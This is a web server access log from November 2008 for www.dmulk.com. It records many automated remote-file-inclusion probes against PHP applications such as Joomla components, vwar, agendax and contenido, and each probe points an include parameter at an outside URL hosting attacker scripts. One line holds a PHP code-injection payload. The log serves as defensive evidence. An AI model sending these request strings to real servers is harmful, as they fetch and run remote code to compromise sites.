207.58.164.77 - - [10/Nov/2008:09:58:09 -0800] "GET /logs/access_071222.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://myypaa.org/templates/base/css/idFeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
207.58.164.77 - - [10/Nov/2008:09:58:09 -0800] "GET /logs/access_071215.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://myypaa.org/templates/base/css/idFeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
154.5.252.194 - - [10/Nov/2008:09:58:09 -0800] "GET /logs/access_080324.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.minart.org/bbs/data/a3.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.233.172.64 - - [10/Nov/2008:09:58:14 -0800] "GET /logs/access_080530.log//index.php?_SERVER[DOCUMENT_ROOT]=http://www.hexapharm.com/extranet/locales/en/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.233.172.64 - - [10/Nov/2008:09:58:15 -0800] "GET /index.php?_SERVER[DOCUMENT_ROOT]=http://www.hexapharm.com/extranet/locales/en/id.txt? HTTP/1.1" 200 94901 "-" "libwww-perl/5.805" "www.dmulk.com"
87.233.172.64 - - [10/Nov/2008:09:58:16 -0800] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://www.hexapharm.com/extranet/locales/en/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [10/Nov/2008:09:58:31 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.suntalent.com.tw//appserv/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [10/Nov/2008:09:58:31 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.suntalent.com.tw//appserv/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [10/Nov/2008:09:58:33 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.suntalent.com.tw//appserv/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [10/Nov/2008:09:58:34 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.suntalent.com.tw//appserv/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.239.150.177 - - [10/Nov/2008:09:58:45 -0800] "GET /logs/access_071215.log//?_zb_path=http://ggdo.com/zboard/xxx/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.239.150.177 - - [10/Nov/2008:09:58:48 -0800] "GET /logs/access_071215.log//?_zb_path=http://ggdo.com/zboard/xxx/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.239.150.177 - - [10/Nov/2008:09:58:50 -0800] "GET /logs/access_071215.log//?_zb_path=http://ggdo.com/zboard/xxx/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
124.217.243.21 - - [10/Nov/2008:09:58:53 -0800] "GET /logs/access_080610.log/protection.php?action=logout&siteurl=http://www.artisangroupre.com/downlaod/LUXURYNEWSLETTER2008/format.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
124.217.243.21 - - [10/Nov/2008:09:58:54 -0800] "GET /protection.php?action=logout&siteurl=http://www.artisangroupre.com/downlaod/LUXURYNEWSLETTER2008/format.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
124.217.243.21 - - [10/Nov/2008:09:58:54 -0800] "GET /logs/protection.php?action=logout&siteurl=http://www.artisangroupre.com/downlaod/LUXURYNEWSLETTER2008/format.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
203.215.243.76 - - [10/Nov/2008:09:58:57 -0800] "GET /logs/access_080817.log/errors.php?error=http://not-network.com/idscan8.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
124.217.243.21 - - [10/Nov/2008:09:58:57 -0800] "GET /logs/access_080621.log/protection.php?action=logout&siteurl=http://www.artisangroupre.com/downlaod/LUXURYNEWSLETTER2008/format.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
211.239.150.177 - - [10/Nov/2008:09:58:59 -0800] "GET /logs/access_071215.log//?_zb_path=http://ggdo.com/zboard/xxx/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.215.243.76 - - [10/Nov/2008:09:59:01 -0800] "GET /logs/access_080817.log/errors.php?error=http://not-network.com/idscan8.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.203.223.59 - - [10/Nov/2008:09:59:01 -0800] "GET /logs/access_081026.log//kboard.php?board=companynews&act=view&no=http://www.ducellier-avocats.eu/images_modif/New.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
85.119.152.5 - - [10/Nov/2008:09:59:05 -0800] "GET /logs/access_080530.log/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
85.119.152.5 - - [10/Nov/2008:09:59:05 -0800] "GET /contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
85.119.152.5 - - [10/Nov/2008:09:59:05 -0800] "GET /logs/contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
219.85.63.226 - - [10/Nov/2008:09:59:10 -0800] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://guitar3.com/finance7/temp/idfeelcomz.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
219.85.63.226 - - [10/Nov/2008:09:59:10 -0800] "GET /logs/access_080807.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://guitar3.com/finance7/temp/idfeelcomz.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
219.85.63.226 - - [10/Nov/2008:09:59:10 -0800] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://guitar3.com/finance7/temp/idfeelcomz.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
219.85.63.226 - - [10/Nov/2008:09:59:10 -0800] "GET /logs/access_080520.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://guitar3.com/finance7/temp/idfeelcomz.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
216.46.174.20 - - [10/Nov/2008:09:59:13 -0800] "GET /logs/access_080303.log///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=ftp://195.145.231.178/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.46.174.20 - - [10/Nov/2008:09:59:13 -0800] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=ftp://195.145.231.178/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.46.174.20 - - [10/Nov/2008:09:59:13 -0800] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=ftp://195.145.231.178/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.198.54.67 - - [10/Nov/2008:09:59:23 -0800] "GET /logs/access_080408.log/pages.php?page=http://www.helpcerto.com.br/~jmt/a.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
88.198.54.67 - - [10/Nov/2008:09:59:24 -0800] "GET /pages.php?page=http://www.helpcerto.com.br/~jmt/a.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
88.198.54.67 - - [10/Nov/2008:09:59:24 -0800] "GET /logs/pages.php?page=http://www.helpcerto.com.br/~jmt/a.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
219.85.63.226 - - [10/Nov/2008:09:59:25 -0800] "GET /logs/access_080410.log//agendax/addevent.inc.php?agendax_path=http://guitar3.com/finance7/temp/v7id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.85.63.226 - - [10/Nov/2008:09:59:25 -0800] "GET /agendax/addevent.inc.php?agendax_path=http://guitar3.com/finance7/temp/v7id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.85.63.226 - - [10/Nov/2008:09:59:25 -0800] "GET /logs//agendax/addevent.inc.php?agendax_path=http://guitar3.com/finance7/temp/v7id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.223.59 - - [10/Nov/2008:09:59:26 -0800] "GET /logs/scripts.log/tools/send_reminders.php?noSet=0&includedir=http://usuarios.lycos.es/xQt/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.223.59 - - [10/Nov/2008:09:59:26 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://usuarios.lycos.es/xQt/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.223.59 - - [10/Nov/2008:09:59:26 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://usuarios.lycos.es/xQt/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.122.156.48 - - [10/Nov/2008:09:59:29 -0800] "GET /logs/access_080802.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.deriline.com/mail_list/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
222.122.156.48 - - [10/Nov/2008:09:59:30 -0800] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.deriline.com/mail_list/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
222.122.156.48 - - [10/Nov/2008:09:59:31 -0800] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.deriline.com/mail_list/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
222.122.156.48 - - [10/Nov/2008:09:59:31 -0800] "GET /logs/access_080728.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.deriline.com/mail_list/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.46.174.20 - - [10/Nov/2008:09:59:42 -0800] "GET /logs/access_080724.log///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=ftp://195.145.231.178/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.22.164 - - [10/Nov/2008:09:59:48 -0800] "GET /blog/index.php/2008/06/05/ HTTP/1.0" 200 11000 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
219.85.63.226 - - [10/Nov/2008:09:59:59 -0800] "GET /logs/access_080520.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://guitar3.com/finance7/temp/v7id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.85.63.226 - - [10/Nov/2008:09:59:59 -0800] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://guitar3.com/finance7/temp/v7id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.85.63.226 - - [10/Nov/2008:09:59:59 -0800] "GET /logs/access_080807.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://guitar3.com/finance7/temp/v7id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.85.63.226 - - [10/Nov/2008:09:59:59 -0800] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://guitar3.com/finance7/temp/v7id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.146.15.54 - - [10/Nov/2008:10:00:04 -0800] "GET /logs/access_080329.log%20//?p=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.146.15.54 - - [10/Nov/2008:10:00:05 -0800] "GET /logs/access_080329.log%20//?pag=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
123.214.171.34 - - [10/Nov/2008:10:00:12 -0800] "GET /logs/?sourcedir=http://www.deriline.com/mail_list/help.txt? HTTP/1.1" 200 73021 "-" "libwww-perl/5.79" "www.dmulk.com"
123.214.171.34 - - [10/Nov/2008:10:00:14 -0800] "GET /?sourcedir=http://www.deriline.com/mail_list/help.txt? HTTP/1.1" 200 94669 "-" "libwww-perl/5.79" "www.dmulk.com"
211.239.150.177 - - [10/Nov/2008:10:00:15 -0800] "GET /logs/access_080330.log//?_zb_path=http://ggdo.com/zboard/xxx/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.214.19.188 - - [10/Nov/2008:10:00:21 -0800] "GET /logs/access_080927.log/sohoadmin/program/modules/mods_full/photo_album/includes/login.php?_SESSION[docroot_path]=http://www.italy-villa-rental.info/bwi/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.193.129.120 - - [10/Nov/2008:10:00:22 -0800] "GET /logs/access_080209.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.hfilm.co.kr/bbs/info/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
219.85.63.226 - - [10/Nov/2008:10:00:23 -0800] "GET /agendax/addevent.inc.php?agendax_path=http://guitar3.com/finance7/temp/v7id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.193.129.120 - - [10/Nov/2008:10:00:24 -0800] "GET /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.hfilm.co.kr/bbs/info/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
219.85.63.226 - - [10/Nov/2008:10:00:25 -0800] "GET /logs/access_080408.log//agendax/addevent.inc.php?agendax_path=http://guitar3.com/finance7/temp/v7id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.85.63.226 - - [10/Nov/2008:10:00:25 -0800] "GET /logs//agendax/addevent.inc.php?agendax_path=http://guitar3.com/finance7/temp/v7id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.239.150.177 - - [10/Nov/2008:10:00:28 -0800] "GET /logs/access_080330.log//?_zb_path=http://ggdo.com/zboard/xxx/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
219.85.63.226 - - [10/Nov/2008:10:00:28 -0800] "GET /logs/access_080410.log//agendax/addevent.inc.php?agendax_path=http://guitar3.com/finance7/temp/v7id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.233.172.64 - - [10/Nov/2008:10:00:33 -0800] "GET /logs/access_080606.log//index.php?_SERVER[DOCUMENT_ROOT]=http://www.hexapharm.com/extranet/locales/en/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.87.154.41 - - [10/Nov/2008:10:00:33 -0800] "GET /poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://geocities.com/d.imud/header.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.76.68.90 - - [10/Nov/2008:10:00:34 -0800] "GET /logs/access_080928.log/playing.php/common/db.php?commonpath=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.76.68.90 - - [10/Nov/2008:10:00:35 -0800] "GET /playing.php/common/db.php?commonpath=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.239.150.177 - - [10/Nov/2008:10:00:35 -0800] "GET /logs/access_080330.log//?_zb_path=http://ggdo.com/zboard/xxx/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
212.76.68.90 - - [10/Nov/2008:10:00:35 -0800] "GET /logs/playing.php/common/db.php?commonpath=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.234.72.255 - - [10/Nov/2008:10:00:47 -0800] "GET /logs/access_080104.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://myypaa.org/templates/base/css/idFeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
219.85.63.226 - - [10/Nov/2008:10:00:55 -0800] "GET /logs/access_080703.log//manager/admin/u_ins.php?MGR=http://www.kgau.ru/istiki/backups/V8.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.85.63.226 - - [10/Nov/2008:10:00:55 -0800] "GET /logs//manager/admin/u_ins.php?MGR=http://www.kgau.ru/istiki/backups/V8.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.85.63.226 - - [10/Nov/2008:10:00:55 -0800] "GET /manager/admin/u_ins.php?MGR=http://www.kgau.ru/istiki/backups/V8.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.239.150.177 - - [10/Nov/2008:10:01:16 -0800] "GET /logs/access_080330.log//?_zb_path=http://ggdo.com/zboard/xxx/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.52.166.106 - - [10/Nov/2008:10:01:19 -0800] "GET /logs/errors.php?error=http://www.deriline.com/mail_list/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.52.166.106 - - [10/Nov/2008:10:01:19 -0800] "GET /errors.php?error=http://www.deriline.com/mail_list/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
222.122.156.48 - - [10/Nov/2008:10:01:31 -0800] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.deriline.com/mail_list/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
222.122.156.48 - - [10/Nov/2008:10:01:32 -0800] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.deriline.com/mail_list/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
114.141.2.7 - - [10/Nov/2008:10:01:35 -0800] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://guitar3.com/finance7/temp/v7id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
114.141.2.7 - - [10/Nov/2008:10:01:35 -0800] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://guitar3.com/finance7/temp/v7id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
114.141.2.7 - - [10/Nov/2008:10:01:35 -0800] "GET /logs/access_080807.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://guitar3.com/finance7/temp/v7id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
114.141.2.7 - - [10/Nov/2008:10:01:36 -0800] "GET /logs/access_080520.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://guitar3.com/finance7/temp/v7id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
114.141.2.7 - - [10/Nov/2008:10:01:37 -0800] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://guitar3.com/finance7/temp/v7id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
114.141.2.7 - - [10/Nov/2008:10:01:37 -0800] "GET /logs/access_080807.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://guitar3.com/finance7/temp/v7id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
114.141.2.7 - - [10/Nov/2008:10:01:38 -0800] "GET /logs/access_080520.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://guitar3.com/finance7/temp/v7id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
114.141.2.7 - - [10/Nov/2008:10:01:38 -0800] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://guitar3.com/finance7/temp/v7id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.114.112.155 - - [10/Nov/2008:10:01:42 -0800] "GET /logs/errors.php?error=http://not-network.com/idscan8.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.114.112.155 - - [10/Nov/2008:10:01:42 -0800] "GET /logs/access_080811.log/errors.php?error=http://not-network.com/idscan8.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.114.112.155 - - [10/Nov/2008:10:01:43 -0800] "GET /errors.php?error=http://not-network.com/idscan8.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
123.214.171.34 - - [10/Nov/2008:10:01:50 -0800] "GET /logs/?sourcedir=http://www.deriline.com/mail_list/help.txt? HTTP/1.1" 200 73021 "-" "libwww-perl/5.79" "www.dmulk.com"
123.214.171.34 - - [10/Nov/2008:10:01:52 -0800] "GET /?sourcedir=http://www.deriline.com/mail_list/help.txt? HTTP/1.1" 200 94653 "-" "libwww-perl/5.79" "www.dmulk.com"
200.37.73.221 - - [10/Nov/2008:10:01:59 -0800] "GET //include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=http://www.csj-ath.be/medias/media.prt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.85.63.226 - - [10/Nov/2008:10:02:06 -0800] "GET /agendax/addevent.inc.php?agendax_path=http://guitar3.com/finance7/temp/v7id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.85.63.226 - - [10/Nov/2008:10:02:06 -0800] "GET /logs//agendax/addevent.inc.php?agendax_path=http://guitar3.com/finance7/temp/v7id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.85.63.226 - - [10/Nov/2008:10:02:27 -0800] "GET /agendax/addevent.inc.php?agendax_path=http://guitar3.com/finance7/temp/idfeelcomz.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
219.85.63.226 - - [10/Nov/2008:10:02:29 -0800] "GET /logs//agendax/addevent.inc.php?agendax_path=http://guitar3.com/finance7/temp/idfeelcomz.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
219.85.63.226 - - [10/Nov/2008:10:02:29 -0800] "GET /logs/access_080724.log//agendax/addevent.inc.php?agendax_path=http://guitar3.com/finance7/temp/idfeelcomz.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
24.67.0.44 - - [10/Nov/2008:10:02:39 -0800] "GET /logs/access_080303.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.minart.org/bbs/data/a3.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
24.67.0.44 - - [10/Nov/2008:10:02:40 -0800] "GET /logs/access_080111.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.minart.org/bbs/data/a3.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.98.178.98 - - [10/Nov/2008:10:02:46 -0800] "GET /logs/access_080520.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://abesco.net/slpw/email/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
66.98.178.98 - - [10/Nov/2008:10:02:46 -0800] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://abesco.net/slpw/email/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
66.98.178.98 - - [10/Nov/2008:10:02:46 -0800] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://abesco.net/slpw/email/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
66.98.178.98 - - [10/Nov/2008:10:02:46 -0800] "GET /logs/access_080807.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://abesco.net/slpw/email/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
83.102.137.163 - - [10/Nov/2008:10:02:47 -0800] "GET /logs/access_080824.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.baab.it/osy2.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
83.102.137.163 - - [10/Nov/2008:10:02:48 -0800] "GET /index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.baab.it/osy2.txt? HTTP/1.1" 200 95026 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
216.46.174.20 - - [10/Nov/2008:10:02:49 -0800] "GET /logs/access_081005.log%20//include/admin.lib.inc.php?site_path=ftp://195.145.231.178/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.46.174.20 - - [10/Nov/2008:10:02:49 -0800] "GET /include/admin.lib.inc.php?site_path=ftp://195.145.231.178/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.46.174.20 - - [10/Nov/2008:10:02:49 -0800] "GET /logs//include/admin.lib.inc.php?site_path=ftp://195.145.231.178/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
219.85.63.226 - - [10/Nov/2008:10:02:50 -0800] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://guitar3.com/finance7/temp/v7id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.85.63.226 - - [10/Nov/2008:10:02:50 -0800] "GET /logs/access_080520.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://guitar3.com/finance7/temp/v7id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.85.63.226 - - [10/Nov/2008:10:02:50 -0800] "GET /logs/access_080807.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://guitar3.com/finance7/temp/v7id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.85.63.226 - - [10/Nov/2008:10:02:50 -0800] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://guitar3.com/finance7/temp/v7id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
